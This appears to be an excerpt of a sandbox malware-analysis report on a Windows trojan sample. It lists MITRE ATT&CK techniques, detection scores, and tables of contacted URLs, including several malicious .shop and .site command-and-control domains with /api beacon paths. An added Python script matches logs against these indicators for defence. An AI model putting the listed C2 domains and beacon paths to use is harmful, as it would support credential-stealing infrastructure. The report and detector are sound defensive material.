            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 PowerShell | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 1 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Disable or Modify Tools | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 2 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Source | Detection | Scanner | Label | Link
            SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | 18% | ReversingLabs | |
            https://offensivedzvju.shop/100%Avira URL Cloudmalware
            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%Avira URL Cloudsafe
            http://piriform.com/go/app_cc_privacy_policy0%Avira URL Cloudsafe
            https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
            https://vozmeatillu.shop/100%Avira URL Cloudmalware
            https://store.steampowered.com/steam_refunds/0%Avira URL Cloudsafe
            https://store.steampowered.com/stats/0%Avira URL Cloudsafe
            https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a0%Avira URL Cloudsafe
            https://ballotnwu.site/cP0%Avira URL Cloudsafe
            https://reinforcenh.shop/7100%Avira URL Cloudmalware
            https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
            https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319000%Avira URL Cloudsafe
            https://ghostreedmnu.shop/f100%Avira URL Cloudmalware
            https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%Avira URL Cloudsafe
            https://ballotnwu.site/0%Avira URL Cloudsafe
            https://ballotnwu.site/api100%Avira URL Cloudmalware
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| fragnantbui.shop | 188.114.97.3 | true | true | | unknown |
| gutterydhowi.shop | 104.21.4.136 | true | true | | unknown |
| steamcommunity.com | 104.102.49.254 | true | false | | unknown |
| offensivedzvju.shop | 188.114.97.3 | true | true | | unknown |
| stogeneratmns.shop | 188.114.96.3 | true | true | | unknown |
| reinforcenh.shop | 172.67.208.139 | true | true | | unknown |
| drawzhotdog.shop | 172.67.162.108 | true | true | | unknown |
| ghostreedmnu.shop | 188.114.97.3 | true | true | | unknown |
| vozmeatillu.shop | 188.114.96.3 | true | true | | unknown |
| ballotnwu.site | 172.67.128.144 | true | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| stogeneratmns.shop | true | Avira URL Cloud: malware | unknown |
| reinforcenh.shop | true | Avira URL Cloud: malware | unknown |
| https://reinforcenh.shop/api | true | Avira URL Cloud: malware | unknown |
| ghostreedmnu.shop | true | Avira URL Cloud: malware | unknown |
| https://steamcommunity.com/profiles/76561199724331900 | true | URL Reputation: malware | unknown |
| https://vozmeatillu.shop/api | true | Avira URL Cloud: malware | unknown |
| fragnantbui.shop | true | Avira URL Cloud: malware | unknown |
| https://offensivedzvju.shop/api | true | Avira URL Cloud: malware | unknown |
| offensivedzvju.shop | true | Avira URL Cloud: malware | unknown |
| drawzhotdog.shop | true | Avira URL Cloud: malware | unknown |
| vozmeatillu.shop | true | Avira URL Cloud: malware | unknown |
| https://drawzhotdog.shop/api | true | Avira URL Cloud: malware | unknown |
| https://gutterydhowi.shop/api | true | Avira URL Cloud: malware | unknown |
| https://ballotnwu.site/api | true | Avira URL Cloud: malware | unknown |
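The domain and URL tables above are the sample's C2 infrastructure as the sandbox observed it. As an added example, not part of the Joe Sandbox report, the Python below turns those indicators into a log matcher: it flags DNS queries and proxy requests for the nine C2 domains (exact or subdomain match, never a substring match), records the `/api` beacon path the report lists for each domain, and down-weights hits that match only a C2 IP, because every address in the domain table sits in a Cloudflare proxy range shared with unrelated sites (the ranges are an assumption taken from Cloudflare's published list; check it against the current one). The key=value log format and the log lines are constructed for the example.

```python
"""Match DNS/proxy log lines against the LummaC C2 indicators this report lists.

Added example, not part of the Joe Sandbox report. The domains, IPs and the
/api beacon path come from the report's tables; the log format and the log
lines are constructed for the example.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional

# C2 domains the sample resolved that the report marks Malicious = true.
C2_DOMAINS = {
    "fragnantbui.shop", "gutterydhowi.shop", "offensivedzvju.shop",
    "stogeneratmns.shop", "reinforcenh.shop", "drawzhotdog.shop",
    "ghostreedmnu.shop", "vozmeatillu.shop", "ballotnwu.site",
}

# Addresses those domains resolved to during the analysis run (from the report).
C2_IPS = {
    "188.114.97.3", "104.21.4.136", "188.114.96.3",
    "172.67.208.139", "172.67.162.108", "172.67.128.144",
}

# Every C2 IP above falls inside a Cloudflare proxy range (assumption: ranges
# taken from Cloudflare's published list; verify against the current list).
# A hit on such an address alone says little, since countless unrelated sites
# share it; the domain is the indicator worth alerting on.
SHARED_CDN_RANGES = [
    ipaddress.ip_network(n)
    for n in ("104.16.0.0/13", "172.64.0.0/13", "188.114.96.0/20")
]

# Beacon path: the report lists https://<c2-domain>/api for each C2 domain.
BEACON_PATH = "/api"

KV_RE = re.compile(r"(\w+)=(\S+)")


@dataclass
class Hit:
    line: str
    indicator: str
    confidence: str  # "high": C2 domain seen; "low": only a shared CDN IP seen


def in_shared_cdn(ip: str) -> bool:
    """True if ip lies in one of the shared CDN ranges above."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SHARED_CDN_RANGES)


def domain_matches(name: str) -> bool:
    """Exact or subdomain match against the C2 domain set (no substring matches)."""
    name = name.rstrip(".").lower()
    return any(name == d or name.endswith("." + d) for d in C2_DOMAINS)


def classify(line: str) -> Optional[Hit]:
    """Return a Hit for one constructed key=value log line, or None."""
    fields = dict(KV_RE.findall(line))
    host = fields.get("query") or fields.get("host")
    if host and domain_matches(host):
        indicator = host
        if fields.get("path", "").startswith(BEACON_PATH):
            indicator = host + fields["path"]  # domain plus the beacon path
        return Hit(line, indicator, "high")
    dst = fields.get("dst")
    if dst in C2_IPS:
        # Same address as a C2, but a different (or unknown) host name.
        return Hit(line, dst, "low" if in_shared_cdn(dst) else "high")
    return None


def scan(lines):
    """Run classify over every line and keep the hits, in input order."""
    return [h for h in (classify(l) for l in lines) if h]


# Constructed log lines (not from the report): one DNS and one proxy format.
SAMPLE_LOG = """\
2024-09-27T10:01:02Z dns client=10.0.0.5 query=reinforcenh.shop type=A
2024-09-27T10:01:03Z proxy client=10.0.0.5 dst=172.67.208.139 host=reinforcenh.shop method=POST path=/api
2024-09-27T10:01:04Z dns client=10.0.0.7 query=steamcommunity.com type=A
2024-09-27T10:01:05Z proxy client=10.0.0.9 dst=188.114.97.3 host=example-blog.net method=GET path=/
2024-09-27T10:01:06Z dns client=10.0.0.5 query=cdn.ghostreedmnu.shop type=A
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.confidence:4} {hit.indicator}: {hit.line}")
```

On the sample log the matcher raises three high-confidence hits (the DNS query for reinforcenh.shop, the POST to reinforcenh.shop/api, and the query for a subdomain of ghostreedmnu.shop) and one low-confidence hit for the request to 188.114.97.3 under an unrelated host name; the query for steamcommunity.com, which the report marks as not malicious, is ignored. Blocking the domains is the useful control; blocking the six IPs would also block every other Cloudflare-fronted site behind them.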
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://player.vimeo.com | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://reinforcenh.shop//O9 | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| https://steamcommunity.com/?subsection=broadcasts | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://vozmeatillu.shop/O9 | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&amp;l=e | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://store.steampowered.com/subscriber_agreement/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://www.gstatic.cn/recaptcha/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://fragnantbui.shop/apip | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| http://www.valvesoftware.com/legal.htm | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://vozmeatillu.shop/0 | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000BC5000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| https://www.youtube.com | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.google.com | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://reinforcenh.shop/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://gutterydhowi.shop/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| https://ballotnwu.site/hP | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://s.ytimg.com; | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://steam.tv/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://ghostreedmnu.shop/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dcd | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://store.steampowered.com/privacy_agreement/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://community.akam | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://store.steampowered.com/points/shop/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://sketchfab.com | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.symauth.com/cps0( | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.dr | false | URL Reputation: safe | unknown |
| https://steamcommunity.com/profiles/76561199724331900/inventory/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown |
| https://www.youtube.com/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://store.steampowered.com/privacy_agreement/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.symauth.com/rpa00 | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.dr | false | URL Reputation: safe | unknown |
| https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://recaptcha.net/recap8 | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.google.com/recaptcha/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://checkout.steampowered.com/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://stogeneratmns.shop/g9 | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://vozmeatillu.shop/apip | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C03000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://store.steampowered.com/; | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://store.steampowered.com/about/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://steamcommunity.com/my/wishlist/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://reinforcenh.shop:443/api | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://help.steampowered.com/en/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://steamcommunity.com/market/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://store.steampowered.com/news/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://community.akamai.steamstatic.com/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://store.steampowered.com/subscriber_agreement/ | SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
